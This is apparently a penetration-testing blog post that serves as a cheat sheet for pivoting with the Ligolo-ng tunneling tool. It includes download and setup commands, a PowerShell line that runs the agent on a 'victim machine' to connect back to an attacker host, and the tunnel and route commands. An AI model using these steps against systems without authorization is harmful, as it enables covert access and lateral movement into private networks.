Network infrastructure and cables

Tunneling with Ligolo-ng

Modern Pivoting Techniques

Ligolo-ng logo

Introduction

I like to use Ligolo-ng for tunneling because it allows me to route traffic through an interface like a VPN instead of having to rely on a bunch of SOCKS tunnels. It also works cross-platform on both Linux and Windows and can be used in much the same way as a traditional C2 system, establishing sessions to victims and issuing commands.

Ligolo-ng can be downloaded from GitHub and there is fairly extensive documentation found on the wiki.

The goal of this post is to essentially serve as a cheat sheet for the tool, providing the commands and scripts required to quickly and easily establish tunnels during engagements.

Setup

The commands below download the appropriate proxy server and agent files (make sure to use the same version and correct OS), then unzip the archives and give execute permissions to the Linux server binary.

bash
wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_windows_amd64.zip
wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
unzip ligolo-ng_agent_0.6.2_windows_amd64.zip
tar xvf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz
chmod +x proxy

Start the Proxy Server

Next, the Ligolo-ng server must be started on the attacking host:

bash
sudo ./proxy -selfcert

Connect the Agent

Copy the Ligolo-ng agent to the victim machine and run it to establish a connection:

powershell
.\agent.exe -connect <kaliIP>:11601 -ignore-cert

Establish the Tunnel

Catch the created session and join it. Then create an interface and start the tunnel:

ligolo-ng
session
1
interface_create --name ligolo
tunnel_start --tun ligolo

Add Routes

Lastly, add a route to the subnet(s) you are trying to reach. Specify dev for device and then pass the name of the interface we created in Ligolo-ng:

bash
sudo ip route add <subnet>/24 dev ligolo

Conclusion

Now a proxy tunnel should be correctly set up that will route all traffic destined for the subnet specified through Ligolo-ng and the victim machine. This provides a clean, VPN-like interface for pivoting into internal networks during penetration tests.